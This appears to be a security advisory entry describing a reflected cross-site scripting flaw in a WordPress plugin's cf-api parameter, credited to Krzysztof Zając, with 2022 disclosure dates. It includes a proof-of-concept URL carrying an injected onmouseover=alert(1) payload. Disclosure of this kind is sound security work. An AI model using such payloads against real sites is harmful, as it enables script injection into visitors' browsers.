The plugin does not validate and escape the cf-api parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting
The issue is only exploitable when there are no forms created yet https://example.com/?cf-api=%22%20style=position:fixed;left:0;top:0;right:0;bottom:0;%20onmouseover=alert(1)%20x
Krzysztof Zając
Krzysztof Zając
Yes
2022-03-28 (about 1 years ago)
2022-03-28 (about 1 years ago)
2022-04-11 (about 1 years ago)